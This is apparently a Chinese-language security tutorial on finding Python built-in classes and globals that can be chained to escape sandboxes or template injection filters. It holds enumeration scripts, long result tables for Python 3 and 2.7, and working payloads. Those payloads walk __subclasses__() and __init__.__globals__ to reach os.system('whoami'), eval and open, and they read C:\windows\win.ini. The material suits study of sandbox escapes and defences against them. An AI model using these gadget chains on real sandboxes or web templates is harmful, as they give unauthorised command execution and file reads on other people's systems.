05 特殊函数查找
特殊函数查找¶
python3¶
在GitHub的python页面上把自带函数全部获取目前的3.8的模块(202)
asyncio
collections
concurrent
ctypes
curses
dbm
distutils
email
encodings
......
......
warnings.py
wave.py
weakref.py
webbrowser.py
xdrlib.py
zipapp.py
zipfile.py
zipimport.py
# coding=UTF-8
import codecs
from collections import defaultdict
with codecs.open('python.txt', 'r', encoding='UTF-8') as f:
modules = f.readlines()
modules = [m.strip().replace('.py', '') for m in modules]
target_modules = ['os', 'platform', 'subprocess', 'timeit', 'importlib', 'codecs', 'sys', 'commands']
target_functions = ['__import__', '__builtins__', 'exec', 'eval', 'execfile', 'compile', 'file', 'open', 'codecs']
all_targets = target_modules + target_functions
results = defaultdict(list)
for m in modules:
try:
module = __import__(m)
except Exception as e:
# print('ERROR:', m)
pass
for t in all_targets:
if t in module.__dict__:
results[m.encode()].append(t)
print("可利用模块数量为:"+str(len(results)))
for k, v in results.items():
print(k, v)
筛选完成后有python3两百个模块可能可以利用,然后再利用脚本进一步筛选
find_modules = {}
target_modules = ['os', 'platform', 'subprocess', 'timeit', 'importlib', 'codecs', 'sys']
target_functions = ['__import__', '__builtins__', 'exec', 'eval', 'execfile', 'compile', 'file', 'open']
all_targets = list(set(list(find_modules.keys()) + target_modules + target_functions))
all_modules = list(set(list(find_modules.keys()) + target_modules))
subclasses = ().__class__.__bases__[0].__subclasses__()
sub_name = [s.__name__ for s in subclasses]
# 第一种遍历,如:().__class__.__bases__[0].__subclasses__()[40]('./test.py').read()
print('----------1-----------')
for i, s in enumerate(sub_name):
for f in all_targets:
if f == s:
if f in target_functions:
print(i, f)
elif f in all_modules:
target = find_modules[f]
sub_dict = subclasses[i].__dict__
for t in target:
if t in sub_dict:
print(i, f, target)
print('----------2-----------')
# 第二种遍历,如:().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ls')
for i, sub in enumerate(subclasses):
try:
more = sub.__init__.__globals__
for m in all_targets:
if m in more:
print(i, sub, m, find_modules.get(m))
except Exception as e:
pass
print('----------3-----------')
# 第三种遍历,如:().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.values()[13]['eval']('__import__("os").system("ls")')
for i, sub in enumerate(subclasses):
try:
more = sub.__init__.__globals__.values()
for j, v in enumerate(more):
for f in all_targets:
try:
if f in v:
if f in target_functions:
print(i, j, sub, f)
elif f in all_modules:
target = find_modules.get(f)
sub_dict = v[f].__dict__
for t in target:
if t in sub_dict:
print(i, j, sub, f, target)
except Exception as e:
pass
except Exception as e:
pass
print('----------4-----------')
# 第四种遍历:如:().__class__.__bases__[0].__subclasses__()[59]()._module.__builtins__['__import__']("os").system("ls")
# <class 'warnings.catch_warnings'>类很特殊,在内部定义了_module=sys.modules['warnings'],然后warnings模块包含有__builtins__,不具有通用性,本质上跟第一种方法类似
for i, sub in enumerate(subclasses):
try:
more = sub()._module.__builtins__
for f in all_targets:
if f in more:
print(i, f)
except Exception as e:
pass
----------2-----------
75 <class '_frozen_importlib._ModuleLock'> __builtins__ None
75 <class '_frozen_importlib._ModuleLock'> __import__ None
75 <class '_frozen_importlib._ModuleLock'> sys None
76 <class '_frozen_importlib._DummyModuleLock'> __builtins__ None
76 <class '_frozen_importlib._DummyModuleLock'> __import__ None
76 <class '_frozen_importlib._DummyModuleLock'> sys None
77 <class '_frozen_importlib._ModuleLockManager'> __builtins__ None
77 <class '_frozen_importlib._ModuleLockManager'> __import__ None
77 <class '_frozen_importlib._ModuleLockManager'> sys None
78 <class '_frozen_importlib._installed_safely'> __builtins__ None
78 <class '_frozen_importlib._installed_safely'> __import__ None
78 <class '_frozen_importlib._installed_safely'> sys None
79 <class '_frozen_importlib.ModuleSpec'> __builtins__ None
79 <class '_frozen_importlib.ModuleSpec'> __import__ None
79 <class '_frozen_importlib.ModuleSpec'> sys None
91 <class '_frozen_importlib_external.FileLoader'> __builtins__ None
91 <class '_frozen_importlib_external.FileLoader'> sys None
92 <class '_frozen_importlib_external._NamespacePath'> __builtins__ None
92 <class '_frozen_importlib_external._NamespacePath'> sys None
93 <class '_frozen_importlib_external._NamespaceLoader'> __builtins__ None
93 <class '_frozen_importlib_external._NamespaceLoader'> sys None
95 <class '_frozen_importlib_external.FileFinder'> __builtins__ None
95 <class '_frozen_importlib_external.FileFinder'> sys None
103 <class 'codecs.IncrementalEncoder'> __builtins__ None
103 <class 'codecs.IncrementalEncoder'> sys None
103 <class 'codecs.IncrementalEncoder'> open None
104 <class 'codecs.IncrementalDecoder'> __builtins__ None
104 <class 'codecs.IncrementalDecoder'> sys None
104 <class 'codecs.IncrementalDecoder'> open None
105 <class 'codecs.StreamReaderWriter'> __builtins__ None
105 <class 'codecs.StreamReaderWriter'> sys None
105 <class 'codecs.StreamReaderWriter'> open None
106 <class 'codecs.StreamRecoder'> __builtins__ None
106 <class 'codecs.StreamRecoder'> sys None
106 <class 'codecs.StreamRecoder'> open None
128 <class 'os._wrap_close'> __builtins__ None
128 <class 'os._wrap_close'> sys None
128 <class 'os._wrap_close'> open None
129 <class '_sitebuiltins.Quitter'> __builtins__ None
129 <class '_sitebuiltins.Quitter'> sys None
130 <class '_sitebuiltins._Printer'> __builtins__ None
130 <class '_sitebuiltins._Printer'> sys None
137 <class 'types.DynamicClassAttribute'> __builtins__ None
138 <class 'types._GeneratorWrapper'> __builtins__ None
139 <class 'warnings.WarningMessage'> __builtins__ None
139 <class 'warnings.WarningMessage'> sys None
140 <class 'warnings.catch_warnings'> __builtins__ None
140 <class 'warnings.catch_warnings'> sys None
167 <class 'reprlib.Repr'> __builtins__ None
174 <class 'functools.partialmethod'> __builtins__ None
176 <class 'contextlib._GeneratorContextManagerBase'> __builtins__ None
176 <class 'contextlib._GeneratorContextManagerBase'> sys None
177 <class 'contextlib._BaseExitStack'> __builtins__ None
177 <class 'contextlib._BaseExitStack'> sys None
----------3-----------
75 5 <class '_frozen_importlib._ModuleLock'> exec
75 5 <class '_frozen_importlib._ModuleLock'> eval
75 5 <class '_frozen_importlib._ModuleLock'> compile
75 5 <class '_frozen_importlib._ModuleLock'> __import__
75 5 <class '_frozen_importlib._ModuleLock'> open
76 5 <class '_frozen_importlib._DummyModuleLock'> exec
76 5 <class '_frozen_importlib._DummyModuleLock'> eval
76 5 <class '_frozen_importlib._DummyModuleLock'> compile
76 5 <class '_frozen_importlib._DummyModuleLock'> __import__
76 5 <class '_frozen_importlib._DummyModuleLock'> open
77 5 <class '_frozen_importlib._ModuleLockManager'> exec
77 5 <class '_frozen_importlib._ModuleLockManager'> eval
77 5 <class '_frozen_importlib._ModuleLockManager'> compile
77 5 <class '_frozen_importlib._ModuleLockManager'> __import__
77 5 <class '_frozen_importlib._ModuleLockManager'> open
78 5 <class '_frozen_importlib._installed_safely'> exec
78 5 <class '_frozen_importlib._installed_safely'> eval
78 5 <class '_frozen_importlib._installed_safely'> compile
78 5 <class '_frozen_importlib._installed_safely'> __import__
78 5 <class '_frozen_importlib._installed_safely'> open
79 5 <class '_frozen_importlib.ModuleSpec'> exec
79 5 <class '_frozen_importlib.ModuleSpec'> eval
79 5 <class '_frozen_importlib.ModuleSpec'> compile
79 5 <class '_frozen_importlib.ModuleSpec'> __import__
79 5 <class '_frozen_importlib.ModuleSpec'> open
91 5 <class '_frozen_importlib_external.FileLoader'> exec
91 5 <class '_frozen_importlib_external.FileLoader'> eval
91 5 <class '_frozen_importlib_external.FileLoader'> compile
91 5 <class '_frozen_importlib_external.FileLoader'> __import__
91 5 <class '_frozen_importlib_external.FileLoader'> open
92 5 <class '_frozen_importlib_external._NamespacePath'> exec
92 5 <class '_frozen_importlib_external._NamespacePath'> eval
92 5 <class '_frozen_importlib_external._NamespacePath'> compile
92 5 <class '_frozen_importlib_external._NamespacePath'> __import__
92 5 <class '_frozen_importlib_external._NamespacePath'> open
93 5 <class '_frozen_importlib_external._NamespaceLoader'> exec
93 5 <class '_frozen_importlib_external._NamespaceLoader'> eval
93 5 <class '_frozen_importlib_external._NamespaceLoader'> compile
93 5 <class '_frozen_importlib_external._NamespaceLoader'> __import__
93 5 <class '_frozen_importlib_external._NamespaceLoader'> open
95 5 <class '_frozen_importlib_external.FileFinder'> exec
95 5 <class '_frozen_importlib_external.FileFinder'> eval
95 5 <class '_frozen_importlib_external.FileFinder'> compile
95 5 <class '_frozen_importlib_external.FileFinder'> __import__
95 5 <class '_frozen_importlib_external.FileFinder'> open
103 7 <class 'codecs.IncrementalEncoder'> exec
103 7 <class 'codecs.IncrementalEncoder'> eval
103 7 <class 'codecs.IncrementalEncoder'> compile
103 7 <class 'codecs.IncrementalEncoder'> __import__
103 7 <class 'codecs.IncrementalEncoder'> open
103 56 <class 'codecs.IncrementalEncoder'> open
104 7 <class 'codecs.IncrementalDecoder'> exec
104 7 <class 'codecs.IncrementalDecoder'> eval
104 7 <class 'codecs.IncrementalDecoder'> compile
104 7 <class 'codecs.IncrementalDecoder'> __import__
104 7 <class 'codecs.IncrementalDecoder'> open
104 56 <class 'codecs.IncrementalDecoder'> open
105 7 <class 'codecs.StreamReaderWriter'> exec
105 7 <class 'codecs.StreamReaderWriter'> eval
105 7 <class 'codecs.StreamReaderWriter'> compile
105 7 <class 'codecs.StreamReaderWriter'> __import__
105 7 <class 'codecs.StreamReaderWriter'> open
105 56 <class 'codecs.StreamReaderWriter'> open
106 7 <class 'codecs.StreamRecoder'> exec
106 7 <class 'codecs.StreamRecoder'> eval
106 7 <class 'codecs.StreamRecoder'> compile
106 7 <class 'codecs.StreamRecoder'> __import__
106 7 <class 'codecs.StreamRecoder'> open
106 56 <class 'codecs.StreamRecoder'> open
128 1 <class 'os._wrap_close'> exec
128 1 <class 'os._wrap_close'> file
128 1 <class 'os._wrap_close'> open
128 7 <class 'os._wrap_close'> exec
128 7 <class 'os._wrap_close'> eval
128 7 <class 'os._wrap_close'> compile
128 7 <class 'os._wrap_close'> __import__
128 7 <class 'os._wrap_close'> open
128 11 <class 'os._wrap_close'> open
129 7 <class '_sitebuiltins.Quitter'> exec
129 7 <class '_sitebuiltins.Quitter'> eval
129 7 <class '_sitebuiltins.Quitter'> compile
129 7 <class '_sitebuiltins.Quitter'> __import__
129 7 <class '_sitebuiltins.Quitter'> open
130 7 <class '_sitebuiltins._Printer'> exec
130 7 <class '_sitebuiltins._Printer'> eval
130 7 <class '_sitebuiltins._Printer'> compile
130 7 <class '_sitebuiltins._Printer'> __import__
130 7 <class '_sitebuiltins._Printer'> open
137 7 <class 'types.DynamicClassAttribute'> exec
137 7 <class 'types.DynamicClassAttribute'> eval
137 7 <class 'types.DynamicClassAttribute'> compile
137 7 <class 'types.DynamicClassAttribute'> __import__
137 7 <class 'types.DynamicClassAttribute'> open
138 7 <class 'types._GeneratorWrapper'> exec
138 7 <class 'types._GeneratorWrapper'> eval
138 7 <class 'types._GeneratorWrapper'> compile
138 7 <class 'types._GeneratorWrapper'> __import__
138 7 <class 'types._GeneratorWrapper'> open
139 7 <class 'warnings.WarningMessage'> exec
139 7 <class 'warnings.WarningMessage'> eval
139 7 <class 'warnings.WarningMessage'> compile
139 7 <class 'warnings.WarningMessage'> __import__
139 7 <class 'warnings.WarningMessage'> open
140 7 <class 'warnings.catch_warnings'> exec
140 7 <class 'warnings.catch_warnings'> eval
140 7 <class 'warnings.catch_warnings'> compile
140 7 <class 'warnings.catch_warnings'> __import__
140 7 <class 'warnings.catch_warnings'> open
167 7 <class 'reprlib.Repr'> exec
167 7 <class 'reprlib.Repr'> eval
167 7 <class 'reprlib.Repr'> compile
167 7 <class 'reprlib.Repr'> __import__
167 7 <class 'reprlib.Repr'> open
174 7 <class 'functools.partialmethod'> exec
174 7 <class 'functools.partialmethod'> eval
174 7 <class 'functools.partialmethod'> compile
174 7 <class 'functools.partialmethod'> __import__
174 7 <class 'functools.partialmethod'> open
176 7 <class 'contextlib._GeneratorContextManagerBase'> exec
176 7 <class 'contextlib._GeneratorContextManagerBase'> eval
176 7 <class 'contextlib._GeneratorContextManagerBase'> compile
176 7 <class 'contextlib._GeneratorContextManagerBase'> __import__
176 7 <class 'contextlib._GeneratorContextManagerBase'> open
177 7 <class 'contextlib._BaseExitStack'> exec
177 7 <class 'contextlib._BaseExitStack'> eval
177 7 <class 'contextlib._BaseExitStack'> compile
177 7 <class 'contextlib._BaseExitStack'> __import__
177 7 <class 'contextlib._BaseExitStack'> open
----------4-----------
140 exec
140 eval
140 compile
140 __import__
140 open
筛选出来的模块还是很多,每个分块中,不用的部分代表利用不同的方式,为了更方便的利用进一步筛选具有更直接利用方式的类,关注再命令执行和读写上
----------2-----------
103 <class 'codecs.IncrementalEncoder'> open None
104 <class 'codecs.IncrementalDecoder'> open None
105 <class 'codecs.StreamReaderWriter'> open None
106 <class 'codecs.StreamRecoder'> open None
128 <class 'os._wrap_close'> open None
----------3-----------
75 5 <class '_frozen_importlib._ModuleLock'> open
75 5 <class '_frozen_importlib._ModuleLock'> exec
76 5 <class '_frozen_importlib._DummyModuleLock'> open
76 5 <class '_frozen_importlib._DummyModuleLock'> exec
77 5 <class '_frozen_importlib._ModuleLockManager'> open
77 5 <class '_frozen_importlib._ModuleLockManager'> exec
78 5 <class '_frozen_importlib._installed_safely'> open
78 5 <class '_frozen_importlib._installed_safely'> exec
79 5 <class '_frozen_importlib.ModuleSpec'> open
79 5 <class '_frozen_importlib.ModuleSpec'> exec
91 5 <class '_frozen_importlib_external.FileLoader'> open
91 5 <class '_frozen_importlib_external.FileLoader'> exec
92 5 <class '_frozen_importlib_external._NamespacePath'> open
92 5 <class '_frozen_importlib_external._NamespacePath'> exec
93 5 <class '_frozen_importlib_external._NamespaceLoader'> open
93 5 <class '_frozen_importlib_external._NamespaceLoader'> exec
95 5 <class '_frozen_importlib_external.FileFinder'> open
95 5 <class '_frozen_importlib_external.FileFinder'> exec
103 7 <class 'codecs.IncrementalEncoder'> open
103 7 <class 'codecs.IncrementalEncoder'> exec
103 56 <class 'codecs.IncrementalEncoder'> open
104 7 <class 'codecs.IncrementalDecoder'> open
104 7 <class 'codecs.IncrementalDecoder'> exec
104 56 <class 'codecs.IncrementalDecoder'> open
105 7 <class 'codecs.StreamReaderWriter'> open
105 7 <class 'codecs.StreamReaderWriter'> exec
105 56 <class 'codecs.StreamReaderWriter'> open
106 7 <class 'codecs.StreamRecoder'> open
106 7 <class 'codecs.StreamRecoder'> exec
106 56 <class 'codecs.StreamRecoder'> open
128 1 <class 'os._wrap_close'> open
128 1 <class 'os._wrap_close'> exec
128 7 <class 'os._wrap_close'> open
128 7 <class 'os._wrap_close'> exec
128 11 <class 'os._wrap_close'> open
129 7 <class '_sitebuiltins.Quitter'> open
129 7 <class '_sitebuiltins.Quitter'> exec
130 7 <class '_sitebuiltins._Printer'> open
130 7 <class '_sitebuiltins._Printer'> exec
137 7 <class 'types.DynamicClassAttribute'> open
137 7 <class 'types.DynamicClassAttribute'> exec
138 7 <class 'types._GeneratorWrapper'> open
138 7 <class 'types._GeneratorWrapper'> exec
139 7 <class 'warnings.WarningMessage'> open
139 7 <class 'warnings.WarningMessage'> exec
140 7 <class 'warnings.catch_warnings'> open
140 7 <class 'warnings.catch_warnings'> exec
167 7 <class 'reprlib.Repr'> open
167 7 <class 'reprlib.Repr'> exec
174 7 <class 'functools.partialmethod'> open
174 7 <class 'functools.partialmethod'> exec
176 7 <class 'contextlib._GeneratorContextManagerBase'> open
176 7 <class 'contextlib._GeneratorContextManagerBase'> exec
177 7 <class 'contextlib._BaseExitStack'> open
177 7 <class 'contextlib._BaseExitStack'> exec
----------4-----------
140 open
140 exec
>>> "".__class__.__bases__[0].__subclasses__()[103]
<class 'codecs.IncrementalEncoder'>
>>> "".__class__.__bases__[0].__subclasses__()[103].__init__.__globals__['open']("C:\\windows\\win.ini").read()
'; for 16-bit app support\n[fonts]\n[extensions]\n[mci extensions]\n[files]\n[Mail]\nMAPI=1\nCMCDLLNAME32=mapi32.dll\nCM
C=1\nMAPIX=1\nMAPIXVER=1.0.0.1\nOLEMessaging=1\n[xianshuabao]\nclient_uuid={xxx}\n'
>>> "".__class__.__bases__[0].__subclasses__()[103].__init__.__globals__['__builtins__']['eval']('__import__("os").system("whoami")')
aiuser
python2¶
python2.7的模块(252)
bsddb
compiler
ctypes
curses
......
......
webbrowser.py
whichdb.py
wsgiref.egg-info
xdrlib.py
xmllib.py
xmlrpclib.py
zipfile.py
----------1-----------
(40, 'file')
----------2-----------
(59, <class 'warnings.WarningMessage'>, 'linecache', ['os', 'sys', '__builtins__'])
(59, <class 'warnings.WarningMessage'>, '__builtins__', None)
(59, <class 'warnings.WarningMessage'>, 'sys', None)
(59, <class 'warnings.WarningMessage'>, 'types', ['__builtins__'])
(60, <class 'warnings.catch_warnings'>, 'linecache', ['os', 'sys', '__builtins__'])
(60, <class 'warnings.catch_warnings'>, '__builtins__', None)
(60, <class 'warnings.catch_warnings'>, 'sys', None)
(60, <class 'warnings.catch_warnings'>, 'types', ['__builtins__'])
(61, <class '_weakrefset._IterationGuard'>, '__builtins__', None)
(62, <class '_weakrefset.WeakSet'>, '__builtins__', None)
(72, <class 'site._Printer'>, '__builtins__', None)
(72, <class 'site._Printer'>, 'traceback', ['sys', '__builtins__'])
(72, <class 'site._Printer'>, 'os', ['sys', '__builtins__', 'open'])
(72, <class 'site._Printer'>, 'sys', None)
(77, <class 'site.Quitter'>, '__builtins__', None)
(77, <class 'site.Quitter'>, 'traceback', ['sys', '__builtins__'])
(77, <class 'site.Quitter'>, 'os', ['sys', '__builtins__', 'open'])
(77, <class 'site.Quitter'>, 'sys', None)
(78, <class 'codecs.IncrementalEncoder'>, '__builtins__', None)
(78, <class 'codecs.IncrementalEncoder'>, 'sys', None)
(78, <class 'codecs.IncrementalEncoder'>, 'open', None)
(79, <class 'codecs.IncrementalDecoder'>, '__builtins__', None)
(79, <class 'codecs.IncrementalDecoder'>, 'sys', None)
(79, <class 'codecs.IncrementalDecoder'>, 'open', None)
----------3-----------
(59, 13, <class 'warnings.WarningMessage'>, '__import__')
(59, 13, <class 'warnings.WarningMessage'>, 'file')
(59, 13, <class 'warnings.WarningMessage'>, 'compile')
(59, 13, <class 'warnings.WarningMessage'>, 'eval')
(59, 13, <class 'warnings.WarningMessage'>, 'open')
(59, 13, <class 'warnings.WarningMessage'>, 'execfile')
(60, 13, <class 'warnings.catch_warnings'>, '__import__')
(60, 13, <class 'warnings.catch_warnings'>, 'file')
(60, 13, <class 'warnings.catch_warnings'>, 'compile')
(60, 13, <class 'warnings.catch_warnings'>, 'eval')
(60, 13, <class 'warnings.catch_warnings'>, 'open')
(60, 13, <class 'warnings.catch_warnings'>, 'execfile')
(61, 1, <class '_weakrefset._IterationGuard'>, '__import__')
(61, 1, <class '_weakrefset._IterationGuard'>, 'file')
(61, 1, <class '_weakrefset._IterationGuard'>, 'compile')
(61, 1, <class '_weakrefset._IterationGuard'>, 'eval')
(61, 1, <class '_weakrefset._IterationGuard'>, 'open')
(61, 1, <class '_weakrefset._IterationGuard'>, 'execfile')
(62, 1, <class '_weakrefset.WeakSet'>, '__import__')
(62, 1, <class '_weakrefset.WeakSet'>, 'file')
(62, 1, <class '_weakrefset.WeakSet'>, 'compile')
(62, 1, <class '_weakrefset.WeakSet'>, 'eval')
(62, 1, <class '_weakrefset.WeakSet'>, 'open')
(62, 1, <class '_weakrefset.WeakSet'>, 'execfile')
(72, 20, <class 'site._Printer'>, 'file')
(72, 20, <class 'site._Printer'>, 'exec')
(72, 23, <class 'site._Printer'>, '__import__')
(72, 23, <class 'site._Printer'>, 'file')
(72, 23, <class 'site._Printer'>, 'compile')
(72, 23, <class 'site._Printer'>, 'eval')
(72, 23, <class 'site._Printer'>, 'open')
(72, 23, <class 'site._Printer'>, 'execfile')
(77, 20, <class 'site.Quitter'>, 'file')
(77, 20, <class 'site.Quitter'>, 'exec')
(77, 23, <class 'site.Quitter'>, '__import__')
(77, 23, <class 'site.Quitter'>, 'file')
(77, 23, <class 'site.Quitter'>, 'compile')
(77, 23, <class 'site.Quitter'>, 'eval')
(77, 23, <class 'site.Quitter'>, 'open')
(77, 23, <class 'site.Quitter'>, 'execfile')
(78, 21, <class 'codecs.IncrementalEncoder'>, 'open')
(78, 23, <class 'codecs.IncrementalEncoder'>, '__import__')
(78, 23, <class 'codecs.IncrementalEncoder'>, 'file')
(78, 23, <class 'codecs.IncrementalEncoder'>, 'compile')
(78, 23, <class 'codecs.IncrementalEncoder'>, 'eval')
(78, 23, <class 'codecs.IncrementalEncoder'>, 'open')
(78, 23, <class 'codecs.IncrementalEncoder'>, 'execfile')
(79, 21, <class 'codecs.IncrementalDecoder'>, 'open')
(79, 23, <class 'codecs.IncrementalDecoder'>, '__import__')
(79, 23, <class 'codecs.IncrementalDecoder'>, 'file')
(79, 23, <class 'codecs.IncrementalDecoder'>, 'compile')
(79, 23, <class 'codecs.IncrementalDecoder'>, 'eval')
(79, 23, <class 'codecs.IncrementalDecoder'>, 'open')
(79, 23, <class 'codecs.IncrementalDecoder'>, 'execfile')
----------4-----------
(60, '__import__')
(60, 'file')
(60, 'repr')
(60, 'compile')
(60, 'eval')
(60, 'open')
(60, 'execfile')
进一步获取可以直接执行命令或者读取文件的类
----------1-----------
(40, 'file')
----------2-----------
(59, <class 'warnings.WarningMessage'>, 'linecache', ['os', 'sys', '__builtins__'])
(59, <class 'warnings.WarningMessage'>, 'types', ['__builtins__'])
(60, <class 'warnings.catch_warnings'>, 'linecache', ['os', 'sys', '__builtins__'])
(60, <class 'warnings.catch_warnings'>, 'types', ['__builtins__'])
(72, <class 'site._Printer'>, 'traceback', ['sys', '__builtins__'])
(72, <class 'site._Printer'>, 'os', ['sys', '__builtins__', 'open'])
(77, <class 'site.Quitter'>, 'traceback', ['sys', '__builtins__'])
(77, <class 'site.Quitter'>, 'os', ['sys', '__builtins__', 'open'])
(78, <class 'codecs.IncrementalEncoder'>, 'open', None)
(79, <class 'codecs.IncrementalDecoder'>, 'open', None)
----------3-----------
(59, 13, <class 'warnings.WarningMessage'>, 'file')
(59, 13, <class 'warnings.WarningMessage'>, 'eval')
(59, 13, <class 'warnings.WarningMessage'>, 'open')
(59, 13, <class 'warnings.WarningMessage'>, 'execfile')
(60, 13, <class 'warnings.catch_warnings'>, 'file')
(60, 13, <class 'warnings.catch_warnings'>, 'eval')
(60, 13, <class 'warnings.catch_warnings'>, 'open')
(60, 13, <class 'warnings.catch_warnings'>, 'execfile')
(61, 1, <class '_weakrefset._IterationGuard'>, 'file')
(61, 1, <class '_weakrefset._IterationGuard'>, 'eval')
(61, 1, <class '_weakrefset._IterationGuard'>, 'open')
(61, 1, <class '_weakrefset._IterationGuard'>, 'execfile')
(62, 1, <class '_weakrefset.WeakSet'>, 'file')
(62, 1, <class '_weakrefset.WeakSet'>, 'eval')
(62, 1, <class '_weakrefset.WeakSet'>, 'open')
(62, 1, <class '_weakrefset.WeakSet'>, 'execfile')
(72, 20, <class 'site._Printer'>, 'file')
(72, 20, <class 'site._Printer'>, 'exec')
(72, 23, <class 'site._Printer'>, 'file')
(72, 23, <class 'site._Printer'>, 'eval')
(72, 23, <class 'site._Printer'>, 'open')
(72, 23, <class 'site._Printer'>, 'execfile')
(77, 20, <class 'site.Quitter'>, 'file')
(77, 20, <class 'site.Quitter'>, 'exec')
(77, 23, <class 'site.Quitter'>, 'file')
(77, 23, <class 'site.Quitter'>, 'eval')
(77, 23, <class 'site.Quitter'>, 'open')
(77, 23, <class 'site.Quitter'>, 'execfile')
(78, 21, <class 'codecs.IncrementalEncoder'>, 'open')
(78, 23, <class 'codecs.IncrementalEncoder'>, 'file')
(78, 23, <class 'codecs.IncrementalEncoder'>, 'eval')
(78, 23, <class 'codecs.IncrementalEncoder'>, 'open')
(78, 23, <class 'codecs.IncrementalEncoder'>, 'execfile')
(79, 21, <class 'codecs.IncrementalDecoder'>, 'open')
(79, 23, <class 'codecs.IncrementalDecoder'>, 'file')
(79, 23, <class 'codecs.IncrementalDecoder'>, 'eval')
(79, 23, <class 'codecs.IncrementalDecoder'>, 'open')
(79, 23, <class 'codecs.IncrementalDecoder'>, 'execfile')
----------4-----------
(60, 'file')
(60, 'repr')
(60, 'eval')
(60, 'open')
(60, 'execfile')
>>> ().__class__.__mro__[-1].__subclasses__()[72]
<class 'site._Printer'>
>>> ().__class__.__mro__[-1].__subclasses__()[72].__init__.__globals__['os'].system('whoami')
aiuser
>>> ().__class__.__mro__[-1].__subclasses__()[72].__init__.__globals__['__builtins__']['file']("C:\\windows\\
win.ini").read()
'; for 16-bit app support\n[fonts]\n[extensions]\n[mciextensions]\n[files]\n[Mail]\nMAPI=1\nCMCDLLNAME32=mapi32.dll\nCMC=1\nMAPIX=1\nMAPIXVER=1.0.0.1\nOLEMessagin